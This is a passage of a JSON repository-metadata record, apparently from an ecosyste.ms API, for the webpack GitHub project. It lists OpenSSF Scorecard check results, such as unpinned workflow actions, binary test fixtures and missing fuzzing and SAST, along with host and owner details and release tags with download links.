artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","h